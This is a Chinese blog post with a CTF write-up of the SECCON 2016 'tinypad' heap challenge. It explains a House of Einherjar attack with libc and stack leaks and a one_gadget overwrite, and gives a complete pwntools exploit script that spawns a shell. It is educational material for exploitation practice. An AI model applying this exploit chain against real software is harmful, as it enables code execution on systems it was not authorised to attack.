house-of-einherjar-tinypad

最新推荐文章于 2024-12-11 23:55:24 发布
原创 最新推荐文章于 2024-12-11 23:55:24 发布 · 553 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#pwn

题目 : secconctf2016_tinypad

保护

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-gAWNgpg1-1642591135200)(house-of-einherjar(tinypad)].assets/image-20220119154650784.png)

分析

add部分:

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-xnx4qtgC-1642591135202)(house-of-einherjar(tinypad)].assets/image-20220119154823873.png)

edit部分:

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-pQ6buMt1-1642591135202)(house-of-einherjar(tinypad)].assets/image-20220119154907216.png)

dele部分:

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-WyxrNPSN-1642591135203)(house-of-einherjar(tinypad)].assets/image-20220119154942892.png)

自带的show部分:

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-XWryFkXR-1642591135203)(house-of-einherjar(tinypad)].assets/image-20220119155030653.png)

其中堆块信息保存在tinypad[0x100]处理解图如下:

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-nLEgGfo8-1642591135204)(house-of-einherjar(tinypad)].assets/image-20220119155938736.png)

思路

上面ida分析的注释中对应解释了程序漏洞所在,那么首先进行libc泄露,首先malloc 4个chunk其中

chunkA :
  1. 必须为unsort bin
  2. 且size必须是8(十六进制)结尾,因为如果malloc 0xe8 ----真实大小—> 0xf0
  3. 这时可以写入的数据为0xe8 通过off-by-one则可以溢出到next_chunk的P标志位.如果malloc 0xe0 -----真实大小---->0xf0 但只能写入0xe0的数据,导致无法溢出
chunkB :
  1. chunkA 和 chunkB用于house of einherjar ,并间隔chunkA,chunkC防止发生合并
  2. chunkB必须为0xf0或者0xf8的大小这样chunkA溢出null字节就不会改变大小,只会改变它的P标志位
chunkC :
  1. 用于泄露heap地址,以便后续计算topchunk到目标地址处的偏移
chunkD :
  1. 用于防止topchunk合并,使chunkC正确的放入unsort bin
#------------leak--------------
add(0xe8,'A')
add(0xf0,'B')  
add(0x100,'C') 
add(0x10,'P') 

ru('INDEX: 1')
ru('CONTENT: ')
heap = uu64(rc(4)) - 0x1f0
success('heap',heap)
ru('INDEX: 3')
ru('CONTENT: ')
libc_base = uu64(rc(6)) - (0x7fb46aa46b78-0x7fb46a683000)
success('libc',libc_base)

进行house of einherjar攻击

#------------attack topchunk----------------
dele(4)#使topchunk合并到chunkB后面 形成house of einher jar标准结构
offset = heap+0xf0-tinypad #topchunk合并chunkB后根据prev_size的大小进行合并的距离
add(0xe8,b'A'*0xe0 +p64(offset)) #通过泄露的堆地址获得和tinypad的偏移 #重新分配到chunkA,并写入数据到chunkB的prev_size
fake = p64(0) + p64(offset) + p64(tinypad)*4
edit(1,fake)  #在目标地址处伪造fakechunk 从而绕过检查
dele(2)   #unlink

此时堆空间图:

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-FhUtiiMA-1642591135205)(house-of-einherjar(tinypad)].assets/image-20220119190918045.png)

因为程序用不了got表修改,那么就可以通过泄露environ (environ变量是一个char** 类型,存储着系统的环境变量)可以通过它来获取libc_start_main的地址,然后修改它为one_gadget在程序最后退出时就会调用getshell

#------------leak stack----------------
add(0xe0,'P'*0x100)  #填充tinypad[0xf0]
environ = libc_base + libc.symbols['__environ']
payload =  p64(1) + p64(environ) + p64(1) + p64(tinypad+0x108)
add(0xe0,payload) #控制tinypad指针领域
ru('INDEX: 1')
ru('CONTENT: ')
libc_start_main = uu64(rc(6))-0xf0 #偏移0xf0就是libc_start_main地址

此时ptr空间图:

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-BvzYXhGH-1642591135205)(house-of-einherjar(tinypad)].assets/image-20220119191440190.png)

最后修改指针就可以getshell了

#------------getshell----------------
edit(2,p64(libc_start_main))
edit(1,p64(libc_base + one[5]))
sla('(CMD)>>>','Q')

修改后的栈空间图:

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-FDCKTTjb-1642591135206)(house-of-einherjar(tinypad)].assets/image-20220119191633598.png)

完整exp:

# -*-coding:utf-8 -*
from pwn import *
import sys

context.log_level = 'debug'
context.arch = 'amd64'
SigreturnFrame(kernel = 'amd64')

binary = "./tinypad"

global p
local = 1
if local:
    p = process(binary)
    e = ELF(binary)
    libc = e.libc
else:
    p = remote("111.200.241.244","58782")
    e = ELF(binary)
    libc = e.libc
    #libc = ELF('./libc_32.so.6')

sd = lambda s:p.send(s)
sl = lambda s:p.sendline(s)
rc = lambda s:p.recv(s)
ru = lambda s:p.recvuntil(s)
sa = lambda a,s:p.sendafter(a,s)
sla = lambda a,s:p.sendlineafter(a,s)
uu32 = lambda data :u32(data.ljust(4, b'\0'))
uu64 = lambda data :u64(data.ljust(8, b'\0'))
u64Leakbase = lambda offset :u64(ru("\x7f")[-6: ] + b'\0\0') - offset
u32Leakbase = lambda offset :u32(ru("\xf7")[-4: ]) - offset
it = lambda :p.interactive()


def z(s='b main'):
 gdb.attach(p,s)

def success(string,addr):
    print('\033[1;31;40m%20s-->0x%x\033[0m'%(string,addr))

def pa(s='暂停!'):
  log.success('当前执行步骤 -> '+str(s))
  pause()
one = [0x45206,0x4525a,0xcc673,0xcc748,0xefa00,0xf0897,0xf5e40,0xef9f4] #2.23
#one = [0x45226,0x4527a,0xcd173,0xcd248,0xf03a4,0xf03b0,0xf1247,0xf67f0]
#idx = int(sys.argv[1])

def add(size,data):
    sla('(CMD)>>>','A')
    sla('(SIZE)>>>',str(size))
    sla('(CONTENT)>>>',data)
def edit(size,data,flag='Y'):
    sla('(CMD)>>>','E')
    sla('(INDEX)>>>',str(size))
    sla('(CONTENT)>>>',data)
    sla('(Y/n)>>>',flag)
def dele(size):
    sla('(CMD)>>>','D')
    sla('(INDEX)>>>',str(size))

tinypad = 0x602040
#------------leak--------------
add(0xe8,'A')
#必须为unsort bin
#且size必须是8(十六进制)结尾,因为如果malloc 0xe8 ----真实大小---> 0xf0
#这时可以写入的数据为0xe8 通过off-by-one则可以溢出到next_chunk的P标志位
#如果malloc 0xe0 -----真实大小---->0xf0  但只能写入0xe0的数据,导致无法溢出
add(0xf0,'B')  #chunkA 和 chunkB用于house of einherjar ,并间隔chunkA,chunkC防止发生合并
#chunkB必须为0xf0或者0xf8这样chunkA溢出null字节就不会改变大小,只会改变它的P标志位
add(0x100,'C')  #用于泄露heap地址,以便下面计算topchunk到目标地址处的偏移
add(0x10,'P')  #用于防止topchunk合并,使chunkC正确的放入unsort bin
dele(3) #先free chunkC再chunkA,不然会获取不到值
dele(1) #泄露libc
ru('INDEX: 1')
ru('CONTENT: ')
heap = uu64(rc(4)) - 0x1f0
success('heap',heap)
ru('INDEX: 3')
ru('CONTENT: ')
libc_base = uu64(rc(6)) - (0x7fb46aa46b78-0x7fb46a683000)
success('libc',libc_base)
#------------attack topchunk----------------
dele(4)#使topchunk合并到chunkB后面 形成house of einher jar标准结构
offset = heap+0xf0-tinypad
add(0xe8,b'A'*0xe0 +p64(offset)) #通过泄露的堆地址获得与tinypad的偏移 ,
                                 #重新分配到chunkA,并写入chunkB的prev_size
fake = p64(0) + p64(offset) + p64(tinypad)*4
edit(1,fake)  #在目标地址处伪造fakechunk 从而绕过检查
dele(2)   #unlink
#------------leak stack----------------
add(0xe0,'P'*0x100)  #填充tinypad[0xf0]
environ = libc_base + libc.symbols['__environ']
#environ 变量是一个char** 类型,存储着系统的环境变量
#可以通过它来获取libc_start_main的地址,然后修改它为one_gadget
payload =  p64(1) + p64(environ) + p64(1) + p64(tinypad+0x108)
add(0xe0,payload) #控制tinypad指针领域
ru('INDEX: 1')
ru('CONTENT: ')
libc_start_main = uu64(rc(6))-0xf0
#------------getshell----------------
edit(2,p64(libc_start_main))
edit(1,p64(libc_base + one[5]))
sla('(CMD)>>>','Q')
#------------end----------------
it()
Einherjar.rebootstrap:PowerPC Mac的操作系统
02-04
Einherjar.rebootstrap是一款专为PowerPC架构的Mac电脑设计的操作系统项目。PowerPC是IBM、Motorola和Apple联合开发的一种高性能处理器架构,曾在20世纪90年代末至21世纪初被广泛应用于Apple的Macintosh计算机。随着...
Einherjar:用于amd64和PowerPC Mac的colorForth计算环境
02-03
$ cd Einherjar/kernel $ make all 步骤3:使用qemu运行(通过使用4Mb的RAM和生成的ISO映像) $ qemu-system-i386 -m 4 -cdrom ../build/roentgenium.iso 步骤4:如果需要,请清理构建 $ make clean
《CTF竞赛权威指南》|house of einherjar
qq_50883855的博客
11-22 1036
house of einherjar
House of Einherjar
qq_45595732的博客
12-03 410
House of Einherjar 原理 free中后向合并的操作(unlink),如果我们可以同时控制一个 chunk prev_size 与 PREV_INUSE 字段,那么我们就可以将新的 chunk 指向几乎任何位置。 free时合并的操作 static void _int_free (mstate av, mchunkptr p, int have_lock) { ... /* consolidate backward */ if (!prev_inuse(p)) {
House of einherjar
tbsqigongzi的博客
07-31 549
释放堆块时,unlink后向合并堆块,强制使得malloc返回一个几乎任意地址的chunk。free函数中的后向合并核心操作如下后向合并时,新的chunk的位置取决于chunk_at_offset(p,-((long)prevsize))
15.house_of_einherjar
06-10 375
源代码 1 #include <stdio.h> 2 #include <stdlib.h> 3 #include <string.h> 4 #include <stdint.h> 5 #include <malloc.h> 6 7 /* 8 Credit to st4...
PWNHouse Of Einherjar&House Of Force
u014377094的博客
05-04 515
ctfwiki上house系列第一个与第二个。利用方法也相对简单,内容也较少,决定一块儿复习了。 House Of Einherjar House Of Einherjar个人理解,通过修改victim堆块的pre_size和pre_inuse,free操作会检查前后已经被释放的堆块,并对都释放了的堆块进行合并操作,如果能够有效伪造堆块fake_chunk,可以让victim块和fake_chunk均伪造为释放状态,最后合并成一个特别大的块,再次申请来某片空间的控制权。 由于extend的操作,其不得
Einherjar:跨平台colorForth环境的快速部署指南
资源摘要信息:"Einherjar是一个为amd64和PowerPC Mac设计的colorForth计算环境。colorForth是一种编程语言,其开发环境旨在实现操作系统与编程语言的无缝结合,为用户提供一种新的使用计算机的方式。Einherjar项目...
PWN学习之House of 系列】House Of Einherjar
weixin_41748164的博客
01-01 1328
溢出写、off by one、off by null。
Tinypad Seccon CTF 2016(House Of Einherjar)
Bill
04-18 1457
Tinypad Seccon CTF 2016(House Of Einherjar) 序言 随着对how2heap的学习, 难度也是越来越大, 改革进入了深水区. 程序运行 1.菜单 | [A] Add memo | | [D] Delet...
【我的 PWN 学习手札】House of Einherjar
最新发布
Mr_Fmnwon的博客
12-11 757
之前学off-by-null的时候,经典的做法是通过覆盖prev-inuse位,释放后造成堆块重叠再进行后续利用。而house of enherjar相比与off-by-null,需要泄露堆地址,条件更宽裕,能够实现更强的效果。
House Of Einherjar(2016 Seccon tinypad)
九层台
09-02 1207
栗子https://github.com/tower111/software.git got表不可写:劫持程序执行流的思路1.复写hook函数。2.覆盖返回地址 canary和NX保护。 漏洞和数据结构 if ( v13 &gt; 0 &amp;&amp; v13 &lt;= 4 ) { if ( *(_QWORD *)&amp;tinypad[16 *...
[house of einherjar] tinypad
huzai9527的博客
05-27 266
[house of einherjar] tinypad 1. Ida 分析 程序直接显示chunk中的内容,相当于show了 delete存在uaf edit函数,tinypad缓冲区读入数据 add函数,只能申请4个chunk,使用read_until读入 read_until存在off by null 2. 思路 条件总结,存在可编辑的数组,存在off by null,chunk中的数据没法轻易的修改(strcpy \x00截断了),可以使用house of ein
2016 Seccon tinypad
yms0211的博客
09-26 614
house of Einherjar练习题
2016 Seccon——tinypad
04-23 630
64位程序  #House Of Einherjar  #use after free 程序逻辑 1 int __cdecl main(int argc, const char **argv, const char **envp) 2 { 3 __int64 v3; // rdx 4 __int64 v4; // rdx 5 __int...
魔兽世界编程宝典读书笔记(8)
默然说话
12-07 3342
<br /> 第8章             魔兽世界编程概述现在该在游戏中创建对你自己有意义的插件了。本章将介绍独立程序运行环境和魔兽世界客户端内部运行环境之间的区别,向您指出Blizzard提供的资源和资料,并介绍许多当您创建自己的插件时很有用的插件。8.1        游戏中运行和测试代码在魔兽世界里运行代码与在游戏的外面运行代码有很大不同,尤其是print()函数在游戏里并不存在,这是由于在游戏里面没有Lua解释程序来输出给定的文本。你可以借助WowLua插件进行修正,或者你也可以自己定义一个pr
《魔兽世界插件》教程---21点扑克游戏 Blackjack
u014372033的专栏
03-26 713
1.效果图 因为我是新手,只能做一个非常简单的插件,21点扑克游戏。比较有趣吧,插件也可以做一个游戏?游戏中的游戏! 2.编写魔兽世界插件准备 首先你要一个最新的魔兽世界客户端,我的有26G大小。记得要申请一个试玩账户,试玩账户不会消耗游戏时间,可不能用正常账户,那调试代码烧点卡烧的厉害!用什么编辑器呢?魔兽世界插件大部分是Lua,一部分是XML,Sc
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值